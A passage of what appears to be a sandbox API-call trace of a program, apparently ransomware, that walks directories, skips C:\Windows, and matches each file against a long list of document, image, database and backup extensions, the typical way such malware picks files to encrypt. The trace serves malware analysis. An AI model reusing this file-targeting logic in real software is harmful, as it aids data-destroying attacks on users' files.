hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.473] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 1 [0035.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 59 [0035.473] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 1 [0035.473] lstrlenW (lpString="TTS20") returned 5 [0035.473] lstrcmpiW (lpString1="C:\\Windows", lpString2="TTS20") returned -1 [0035.473] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3ee0058 [0035.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 59 [0035.473] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.473] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.473] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0035.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 65 [0035.473] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 1 [0035.473] lstrlenW (lpString="en-US") returned 5 [0035.473] lstrcmpiW (lpString1="C:\\Windows", lpString2="en-US") returned -1 [0035.473] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3fda4f0 [0035.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 65 [0035.474] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0035.474] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.474] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="enu-dsk", cAlternateFileName="")) returned 1 [0035.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 73 [0035.474] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 1 [0035.474] lstrlenW (lpString="enu-dsk") returned 7 [0035.474] lstrcmpiW (lpString1="C:\\Windows", lpString2="enu-dsk") returned -1 [0035.474] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3fea4f8 [0035.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 73 [0035.474] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x353eb9c | out: lpFindFileData=0x353eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1200 [0035.474] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353eb9c | out: lpFindFileData=0x353eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.474] FindNextFileW (in: hFindFile=0x3ef1200, lpFindFileData=0x353eb9c | out: lpFindFileData=0x353eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0035.474] FindClose (in: hFindFile=0x3ef1200 | out: hFindFile=0x3ef1200) returned 1 [0035.475] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f8 | out: hHeap=0x570000) returned 1 [0035.475] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x353ee18 | out: lpFindFileData=0x353ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84877a0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc84877a0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0035.475] lstrlenW (lpString="MSTTSFrontendENU.dll") returned 20 [0035.475] lstrlenW (lpString=".1cd") returned 4 [0035.475] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".3ds") returned 4 [0035.475] lstrcmpiW (lpString1=".3ds", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".3fr") returned 4 [0035.475] lstrcmpiW (lpString1=".3fr", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".3g2") returned 4 [0035.475] lstrcmpiW (lpString1=".3g2", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".3gp") returned 4 [0035.475] lstrcmpiW (lpString1=".3gp", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".7z") returned 3 [0035.475] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0035.475] lstrlenW (lpString=".accda") returned 6 [0035.475] lstrcmpiW (lpString1=".accda", lpString2="NU.dll") returned -1 [0035.475] lstrlenW (lpString=".accdb") returned 6 [0035.475] lstrcmpiW (lpString1=".accdb", lpString2="NU.dll") returned -1 [0035.475] lstrlenW (lpString=".accdc") returned 6 [0035.475] lstrcmpiW (lpString1=".accdc", lpString2="NU.dll") returned -1 [0035.475] lstrlenW (lpString=".accde") returned 6 [0035.475] lstrcmpiW (lpString1=".accde", lpString2="NU.dll") returned -1 [0035.475] lstrlenW (lpString=".accdt") returned 6 [0035.475] lstrcmpiW (lpString1=".accdt", lpString2="NU.dll") returned -1 [0035.475] lstrlenW (lpString=".accdw") returned 6 [0035.475] lstrcmpiW (lpString1=".accdw", lpString2="NU.dll") returned -1 [0035.475] lstrlenW (lpString=".adb") returned 4 [0035.475] lstrcmpiW (lpString1=".adb", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".adp") returned 4 [0035.475] lstrcmpiW (lpString1=".adp", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".ai") returned 3 [0035.475] lstrcmpiW (lpString1=".ai", lpString2="dll") returned -1 [0035.475] lstrlenW (lpString=".ai3") returned 4 [0035.475] lstrcmpiW (lpString1=".ai3", lpString2=".dll") returned -1 [0035.475] lstrlenW (lpString=".ai4") returned 4 [0035.476] lstrcmpiW (lpString1=".ai4", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".ai5") returned 4 [0035.476] lstrcmpiW (lpString1=".ai5", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".ai6") returned 4 [0035.476] lstrcmpiW (lpString1=".ai6", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".ai7") returned 4 [0035.476] lstrcmpiW (lpString1=".ai7", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".ai8") returned 4 [0035.476] lstrcmpiW (lpString1=".ai8", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".anim") returned 5 [0035.476] lstrcmpiW (lpString1=".anim", lpString2="U.dll") returned -1 [0035.476] lstrlenW (lpString=".arw") returned 4 [0035.476] lstrcmpiW (lpString1=".arw", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".as") returned 3 [0035.476] lstrcmpiW (lpString1=".as", lpString2="dll") returned -1 [0035.476] lstrlenW (lpString=".asa") returned 4 [0035.476] lstrcmpiW (lpString1=".asa", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".asc") returned 4 [0035.476] lstrcmpiW (lpString1=".asc", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".ascx") returned 5 [0035.476] lstrcmpiW (lpString1=".ascx", lpString2="U.dll") returned -1 [0035.476] lstrlenW (lpString=".asm") returned 4 [0035.476] lstrcmpiW (lpString1=".asm", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".asmx") returned 5 [0035.476] lstrcmpiW (lpString1=".asmx", lpString2="U.dll") returned -1 [0035.476] lstrlenW (lpString=".asp") returned 4 [0035.476] lstrcmpiW (lpString1=".asp", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".aspx") returned 5 [0035.476] lstrcmpiW (lpString1=".aspx", lpString2="U.dll") returned -1 [0035.476] lstrlenW (lpString=".asr") returned 4 [0035.476] lstrcmpiW (lpString1=".asr", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".asx") returned 4 [0035.476] lstrcmpiW (lpString1=".asx", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".avi") returned 4 [0035.476] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0035.476] lstrlenW (lpString=".avs") returned 4 [0035.477] lstrcmpiW (lpString1=".avs", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".backup") returned 7 [0035.477] lstrcmpiW (lpString1=".backup", lpString2="ENU.dll") returned -1 [0035.477] lstrlenW (lpString=".bak") returned 4 [0035.477] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".bay") returned 4 [0035.477] lstrcmpiW (lpString1=".bay", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".bd") returned 3 [0035.477] lstrcmpiW (lpString1=".bd", lpString2="dll") returned -1 [0035.477] lstrlenW (lpString=".bin") returned 4 [0035.477] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".bmp") returned 4 [0035.477] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".bz2") returned 4 [0035.477] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".c") returned 2 [0035.477] lstrcmpiW (lpString1=".c", lpString2="ll") returned -1 [0035.477] lstrlenW (lpString=".cdr") returned 4 [0035.477] lstrcmpiW (lpString1=".cdr", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".cer") returned 4 [0035.477] lstrcmpiW (lpString1=".cer", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".cf") returned 3 [0035.477] lstrcmpiW (lpString1=".cf", lpString2="dll") returned -1 [0035.477] lstrlenW (lpString=".cfc") returned 4 [0035.477] lstrcmpiW (lpString1=".cfc", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".cfm") returned 4 [0035.477] lstrcmpiW (lpString1=".cfm", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".cfml") returned 5 [0035.477] lstrcmpiW (lpString1=".cfml", lpString2="U.dll") returned -1 [0035.477] lstrlenW (lpString=".cfu") returned 4 [0035.477] lstrcmpiW (lpString1=".cfu", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".chm") returned 4 [0035.477] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".cin") returned 4 [0035.477] lstrcmpiW (lpString1=".cin", lpString2=".dll") returned -1 [0035.477] lstrlenW (lpString=".class") returned 6 [0035.477] lstrcmpiW (lpString1=".class", lpString2="NU.dll") returned -1 [0035.478] lstrlenW (lpString=".clx") returned 4 [0035.478] lstrcmpiW (lpString1=".clx", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".config") returned 7 [0035.478] lstrcmpiW (lpString1=".config", lpString2="ENU.dll") returned -1 [0035.478] lstrlenW (lpString=".cpp") returned 4 [0035.478] lstrcmpiW (lpString1=".cpp", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".cr2") returned 4 [0035.478] lstrcmpiW (lpString1=".cr2", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".crt") returned 4 [0035.478] lstrcmpiW (lpString1=".crt", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".crw") returned 4 [0035.478] lstrcmpiW (lpString1=".crw", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".cs") returned 3 [0035.478] lstrcmpiW (lpString1=".cs", lpString2="dll") returned -1 [0035.478] lstrlenW (lpString=".css") returned 4 [0035.478] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".csv") returned 4 [0035.478] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".cub") returned 4 [0035.478] lstrcmpiW (lpString1=".cub", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".dae") returned 4 [0035.478] lstrcmpiW (lpString1=".dae", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".dat") returned 4 [0035.478] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".db") returned 3 [0035.478] lstrcmpiW (lpString1=".db", lpString2="dll") returned -1 [0035.478] lstrlenW (lpString=".dbf") returned 4 [0035.478] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".dbx") returned 4 [0035.478] lstrcmpiW (lpString1=".dbx", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".dc3") returned 4 [0035.478] lstrcmpiW (lpString1=".dc3", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".dcm") returned 4 [0035.478] lstrcmpiW (lpString1=".dcm", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".dcr") returned 4 [0035.478] lstrcmpiW (lpString1=".dcr", lpString2=".dll") returned -1 [0035.478] lstrlenW (lpString=".der") returned 4 [0035.478] lstrcmpiW (lpString1=".der", lpString2=".dll") returned -1 [0035.479] lstrlenW (lpString=".dib") returned 4 [0035.479] lstrcmpiW (lpString1=".dib", lpString2=".dll") returned -1 [0035.479] lstrlenW (lpString=".dic") returned 4 [0035.479] lstrcmpiW (lpString1=".dic", lpString2=".dll") returned -1 [0035.479] lstrlenW (lpString=".dif") returned 4 [0035.479] lstrcmpiW (lpString1=".dif", lpString2=".dll") returned -1 [0035.479] lstrlenW (lpString=".divx") returned 5 [0035.479] lstrcmpiW (lpString1=".divx", lpString2="U.dll") returned -1 [0035.479] lstrlenW (lpString=".djvu") returned 5 [0035.479] lstrcmpiW (lpString1=".djvu", lpString2="U.dll") returned -1 [0035.479] lstrlenW (lpString=".dng") returned 4 [0035.479] lstrcmpiW (lpString1=".dng", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".doc") returned 4 [0035.479] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".docm") returned 5 [0035.479] lstrcmpiW (lpString1=".docm", lpString2="U.dll") returned -1 [0035.479] lstrlenW (lpString=".docx") returned 5 [0035.479] lstrcmpiW (lpString1=".docx", lpString2="U.dll") returned -1 [0035.479] lstrlenW (lpString=".dot") returned 4 [0035.479] lstrcmpiW (lpString1=".dot", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".dotm") returned 5 [0035.479] lstrcmpiW (lpString1=".dotm", lpString2="U.dll") returned -1 [0035.479] lstrlenW (lpString=".dotx") returned 5 [0035.479] lstrcmpiW (lpString1=".dotx", lpString2="U.dll") returned -1 [0035.479] lstrlenW (lpString=".dpx") returned 4 [0035.479] lstrcmpiW (lpString1=".dpx", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".dqy") returned 4 [0035.479] lstrcmpiW (lpString1=".dqy", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".dsn") returned 4 [0035.479] lstrcmpiW (lpString1=".dsn", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".dt") returned 3 [0035.479] lstrcmpiW (lpString1=".dt", lpString2="dll") returned -1 [0035.479] lstrlenW (lpString=".dtd") returned 4 [0035.479] lstrcmpiW (lpString1=".dtd", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".dwg") returned 4 [0035.479] lstrcmpiW (lpString1=".dwg", lpString2=".dll") returned 1 [0035.479] lstrlenW (lpString=".dwt") returned 4 [0035.479] lstrcmpiW (lpString1=".dwt", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".dx") returned 3 [0035.480] lstrcmpiW (lpString1=".dx", lpString2="dll") returned -1 [0035.480] lstrlenW (lpString=".dxf") returned 4 [0035.480] lstrcmpiW (lpString1=".dxf", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".edml") returned 5 [0035.480] lstrcmpiW (lpString1=".edml", lpString2="U.dll") returned -1 [0035.480] lstrlenW (lpString=".efd") returned 4 [0035.480] lstrcmpiW (lpString1=".efd", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".elf") returned 4 [0035.480] lstrcmpiW (lpString1=".elf", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".emf") returned 4 [0035.480] lstrcmpiW (lpString1=".emf", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".emz") returned 4 [0035.480] lstrcmpiW (lpString1=".emz", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".epf") returned 4 [0035.480] lstrcmpiW (lpString1=".epf", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".eps") returned 4 [0035.480] lstrcmpiW (lpString1=".eps", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".epsf") returned 5 [0035.480] lstrcmpiW (lpString1=".epsf", lpString2="U.dll") returned -1 [0035.480] lstrlenW (lpString=".epsp") returned 5 [0035.480] lstrcmpiW (lpString1=".epsp", lpString2="U.dll") returned -1 [0035.480] lstrlenW (lpString=".erf") returned 4 [0035.480] lstrcmpiW (lpString1=".erf", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".exr") returned 4 [0035.480] lstrcmpiW (lpString1=".exr", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".f4v") returned 4 [0035.480] lstrcmpiW (lpString1=".f4v", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".fido") returned 5 [0035.480] lstrcmpiW (lpString1=".fido", lpString2="U.dll") returned -1 [0035.480] lstrlenW (lpString=".flm") returned 4 [0035.480] lstrcmpiW (lpString1=".flm", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".flv") returned 4 [0035.480] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0035.480] lstrlenW (lpString=".frm") returned 4 [0035.480] lstrcmpiW (lpString1=".frm", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".fxg") returned 4 [0035.481] lstrcmpiW (lpString1=".fxg", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".geo") returned 4 [0035.481] lstrcmpiW (lpString1=".geo", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".gif") returned 4 [0035.481] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".grs") returned 4 [0035.481] lstrcmpiW (lpString1=".grs", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".gz") returned 3 [0035.481] lstrcmpiW (lpString1=".gz", lpString2="dll") returned -1 [0035.481] lstrlenW (lpString=".h") returned 2 [0035.481] lstrcmpiW (lpString1=".h", lpString2="ll") returned -1 [0035.481] lstrlenW (lpString=".hdr") returned 4 [0035.481] lstrcmpiW (lpString1=".hdr", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".hpp") returned 4 [0035.481] lstrcmpiW (lpString1=".hpp", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".hta") returned 4 [0035.481] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".htc") returned 4 [0035.481] lstrcmpiW (lpString1=".htc", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".htm") returned 4 [0035.481] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".html") returned 5 [0035.481] lstrcmpiW (lpString1=".html", lpString2="U.dll") returned -1 [0035.481] lstrlenW (lpString=".icb") returned 4 [0035.481] lstrcmpiW (lpString1=".icb", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".ics") returned 4 [0035.481] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".iff") returned 4 [0035.481] lstrcmpiW (lpString1=".iff", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".inc") returned 4 [0035.481] lstrcmpiW (lpString1=".inc", lpString2=".dll") returned 1 [0035.481] lstrlenW (lpString=".indd") returned 5 [0035.481] lstrcmpiW (lpString1=".indd", lpString2="U.dll") returned -1 [0035.481] lstrlenW (lpString=".ini") returned 4 [0035.481] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".iqy") returned 4 [0035.482] lstrcmpiW (lpString1=".iqy", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".j2c") returned 4 [0035.482] lstrcmpiW (lpString1=".j2c", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".j2k") returned 4 [0035.482] lstrcmpiW (lpString1=".j2k", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".java") returned 5 [0035.482] lstrcmpiW (lpString1=".java", lpString2="U.dll") returned -1 [0035.482] lstrlenW (lpString=".jp2") returned 4 [0035.482] lstrcmpiW (lpString1=".jp2", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".jpc") returned 4 [0035.482] lstrcmpiW (lpString1=".jpc", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".jpe") returned 4 [0035.482] lstrcmpiW (lpString1=".jpe", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".jpeg") returned 5 [0035.482] lstrcmpiW (lpString1=".jpeg", lpString2="U.dll") returned -1 [0035.482] lstrlenW (lpString=".jpf") returned 4 [0035.482] lstrcmpiW (lpString1=".jpf", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".jpg") returned 4 [0035.482] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".jpx") returned 4 [0035.482] lstrcmpiW (lpString1=".jpx", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".js") returned 3 [0035.482] lstrcmpiW (lpString1=".js", lpString2="dll") returned -1 [0035.482] lstrlenW (lpString=".jsf") returned 4 [0035.482] lstrcmpiW (lpString1=".jsf", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".json") returned 5 [0035.482] lstrcmpiW (lpString1=".json", lpString2="U.dll") returned -1 [0035.482] lstrlenW (lpString=".jsp") returned 4 [0035.482] lstrcmpiW (lpString1=".jsp", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".kdc") returned 4 [0035.482] lstrcmpiW (lpString1=".kdc", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".kmz") returned 4 [0035.482] lstrcmpiW (lpString1=".kmz", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".kwm") returned 4 [0035.482] lstrcmpiW (lpString1=".kwm", lpString2=".dll") returned 1 [0035.482] lstrlenW (lpString=".lasso") returned 6 [0035.483] lstrcmpiW (lpString1=".lasso", lpString2="NU.dll") returned -1 [0035.483] lstrlenW (lpString=".lbi") returned 4 [0035.483] lstrcmpiW (lpString1=".lbi", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".lgf") returned 4 [0035.483] lstrcmpiW (lpString1=".lgf", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".lgp") returned 4 [0035.483] lstrcmpiW (lpString1=".lgp", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".log") returned 4 [0035.483] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".m1v") returned 4 [0035.483] lstrcmpiW (lpString1=".m1v", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".m4a") returned 4 [0035.483] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".m4v") returned 4 [0035.483] lstrcmpiW (lpString1=".m4v", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".max") returned 4 [0035.483] 